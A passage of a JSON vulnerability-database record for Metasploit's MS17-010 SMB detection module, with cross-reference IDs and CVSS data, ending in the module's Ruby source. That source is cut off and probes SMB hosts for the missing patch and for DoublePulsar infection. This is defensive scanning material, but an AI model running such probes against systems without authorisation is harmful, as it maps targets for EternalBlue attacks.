"1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-09-30T18:12:04", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-09-30T18:12:04", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "79b03fa9178806f1694441cff96d84a3"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "c25dabffe89097874a062017ca347cc8"}, {"key": "published", "hash": "03b7f7b734bdffbd849759d24edab76d"}, {"key": "references", "hash": "2a4acb977d851155649ad6e4f1698975"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "ead92bdcd20cbc918e777e28c4a83623"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "hash": "34a4a1842853199e3b8f4e425f58e25c33802036c3e0a9b9bcecfabfb49e9003", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 SMB RCE Detection", "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "published": "2017-03-29T23:43:49", "modified": "2020-06-09T12:18:52", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://github.com/countercept/doublepulsar-detection-script", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-08-20T01:40:28", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-08-20T01:40:28", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-20T01:40:28", "rev": 2, "value": 4.4, "vector": "NONE"}}, "hash": "83b3e62281ed9bad0c7de60f0d79b0ce369ad0f18d89e984aa56a55972be8cf8", "hashmap": [{"hash": "a350165a58d78e6a7f1ec63091a5caba", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "35e1b19fef57800a5842324245a84fa8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "76342054b3e7ed2a9d215428f6b2e311", "key": "title"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "69112e68efb0c9ff708d829d011d07e9", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "52e40933ae55680339314c4c47c4218f", "key": "description"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "immutableFields": [], "lastseen": "2020-08-20T01:40:28", "modified": "2020-06-09T12:18:52", "objectVersion": "1.5", "published": "2017-03-29T23:43:49", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 4179}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-08-20T01:40:28"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": "2019-05-29T23:03:37", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "7f41373b73b89844d795a75d968d4fd4", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2019-05-29T23:03:37", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! - Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue 